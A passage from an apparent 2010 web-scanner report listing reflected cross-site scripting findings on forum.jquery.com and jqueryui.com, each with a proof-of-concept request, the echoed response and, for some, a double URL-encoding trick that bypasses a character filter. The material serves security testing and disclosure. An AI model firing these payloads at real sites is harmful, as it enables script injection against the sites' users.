This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/jeresig?28ec1"><script>alert(1)</script>bc03636b9be=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7D7D3E93CA4CEE946880A12D3580342F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:49 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/jeresig?28ec1"><script>alert(1)</script>bc03636b9be=1&forumGroupUrl=jquery">
...[SNIP]...

1.16. http://forum.jquery.com/user/kbwood.au [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/kbwood.au

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5770d"><script>alert(1)</script>6ebfd66aa15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/kbwood.au?5770d"><script>alert(1)</script>6ebfd66aa15=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=441BE2E2AB873EAEAFF092B48707C03E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:34 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/kbwood.au?5770d"><script>alert(1)</script>6ebfd66aa15=1&forumGroupUrl=jquery">
...[SNIP]...

1.17. http://forum.jquery.com/user/scottjehl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/scottjehl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621fb"><script>alert(1)</script>c784026de5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/scottjehl?621fb"><script>alert(1)</script>c784026de5e=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0AF93BC4D343B03132D167D13EC07F3D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:25 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/scottjehl?621fb"><script>alert(1)</script>c784026de5e=1&forumGroupUrl=jquery">
...[SNIP]...

1.18. http://forum.jquery.com/user/wycats [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb36"><script>alert(1)</script>b9cc4e4f2c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/wycats?edb36"><script>alert(1)</script>b9cc4e4f2c2=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=991BADAD0230B70297FEBECFA7A4CBD1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:36:24 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/wycats?edb36"><script>alert(1)</script>b9cc4e4f2c2=1&forumGroupUrl=jquery">
...[SNIP]...

1.19. http://jqueryui.com/demos/accordion [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/accordion

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b2754%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e926f00d8d15 was submitted in the REST URL parameter 2. This input was echoed as b2754</title><script>alert(1)</script>926f00d8d15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /demos/accordionb2754%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e926f00d8d15 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Accordionb2754</title><script>alert(1)</script>926f00d8d15 Demos & Documentation</title>

   <meta name="keywords" conten
...[SNIP]...

1.20. http://jqueryui.com/demos/addClass [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/addClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a598d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78e80d742b6 was submitted in the REST URL parameter 2. This input was echoed as a598d</title><script>alert(1)</script>78e80d742b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/addClassa598d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78e80d742b6 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7893

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - AddClassa598d</title><script>alert(1)</script>78e80d742b6 Demos & Documentation</title>

   <meta name="keywords" content
...[SNIP]...

1.21. http://jqueryui.com/demos/animate [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/animate

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2dd49%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80b730e6bf2 was submitted in the REST URL parameter 2. This input was echoed as 2dd49</title><script>alert(1)</script>80b730e6bf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/animate2dd49%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80b730e6bf2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7892

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Animate2dd49</title><script>alert(1)</script>80b730e6bf2 Demos & Documentation</title>

   <meta name="keywords" content=
...[SNIP]...

1.22. http://jqueryui.com/demos/autocomplete [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/autocomplete

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 37618%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e803fc703c was submitted in the REST URL parameter 2. This input was echoed as 37618</title><script>alert(1)</script>3e803fc703c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/autocomplete37618%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3e803fc703c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7897

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Autocomplete37618</title><script>alert(1)</script>3e803fc703c Demos & Documentation</title>

   <meta name="keywords" con
...[SNIP]...

1.23. http://jqueryui.com/demos/button [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/button

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 93fdc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e626eca3fe was submitted in the REST URL parameter 2. This input was echoed as 93fdc</title><script>alert(1)</script>2e626eca3fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/button93fdc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e626eca3fe HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Button93fdc</title><script>alert(1)</script>2e626eca3fe Demos & Documentation</title>

   <meta name="keywords" content="
...[SNIP]...

1.24. http://jqueryui.com/demos/datepicker [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/datepicker

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 396a5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efa1066960be was submitted in the REST URL parameter 2. This input was echoed as 396a5</title><script>alert(1)</script>fa1066960be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/datepicker396a5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efa1066960be HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7895

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Datepicker396a5</title><script>alert(1)</script>fa1066960be Demos & Documentation</title>

   <meta name="keywords" conte
...[SNIP]...

1.25. http://jqueryui.com/demos/dialog [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/dialog

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e3220%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e374ba0e42cd was submitted in the REST URL parameter 2. This input was echoed as e3220</title><script>alert(1)</script>374ba0e42cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/dialoge3220%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e374ba0e42cd HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Dialoge3220</title><script>alert(1)</script>374ba0e42cd Demos & Documentation</title>

   <meta name="keywords" content="
...[SNIP]...

1.26. http://jqueryui.com/demos/draggable [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/draggable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 913fc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea299844092b was submitted in the REST URL parameter 2. This input was echoed as 913fc</title><script>alert(1)</script>a299844092b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/draggable913fc%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea299844092b HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Draggable913fc</title><script>alert(1)</script>a299844092b Demos & Documentation</title>

   <meta name="keywords" conten
...[SNIP]...

1.27. http://jqueryui.com/demos/droppable [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/droppable

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a0098%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c0df0c52f2 was submitted in the REST URL parameter 2. This input was echoed as a0098</title><script>alert(1)</script>4c0df0c52f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/droppablea0098%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4c0df0c52f2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7894

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Droppablea0098</title><script>alert(1)</script>4c0df0c52f2 Demos & Documentation</title>

   <meta name="keywords" conten
...[SNIP]...

1.28. http://jqueryui.com/demos/effect [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/effect

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 7468d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3e432863c5 was submitted in the REST URL parameter 2. This input was echoed as 7468d</title><script>alert(1)</script>c3e432863c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/effect7468d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3e432863c5 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7891

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Effect7468d</title><script>alert(1)</script>c3e432863c5 Demos & Documentation</title>

   <meta name="keywords" content="
...[SNIP]...

1.29. http://jqueryui.com/demos/hide [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/hide

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e052a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93d47fc3cbb was submitted in the REST URL parameter 2. This input was echoed as e052a</title><script>alert(1)</script>93d47fc3cbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/hidee052a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93d47fc3cbb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7889

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Hidee052a</title><script>alert(1)</script>93d47fc3cbb Demos & Documentation</title>

   <meta name="keywords" content="jq
...[SNIP]...

1.30. http://jqueryui.com/demos/position [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/position

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b47ea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec08edf90c4c was submitted in the REST URL parameter 2. This input was echoed as b47ea</title><script>alert(1)</script>c08edf90c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/positionb47ea%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec08edf90c4c HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7893

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Positionb47ea</title><script>alert(1)</script>c08edf90c4c Demos & Documentation</title>

   <meta name="keywords" content
...[SNIP]...

1.31. http://jqueryui.com/demos/progressbar [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/progressbar

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 31403%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e47c6884e7ee was submitted in the REST URL parameter 2. This input was echoed as 31403</title><script>alert(1)</script>47c6884e7ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/progressbar31403%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e47c6884e7ee HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - Progressbar31403</title><script>alert(1)</script>47c6884e7ee Demos & Documentation</title>

   <meta name="keywords" cont
...[SNIP]...

1.32. http://jqueryui.com/demos/removeClass [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/demos/removeClass

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload a472b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4022b6ec612 was submitted in the REST URL parameter 2. This input was echoed as a472b</title><script>alert(1)</script>4022b6ec612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /demos/removeClassa472b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4022b6ec612 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 7896

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
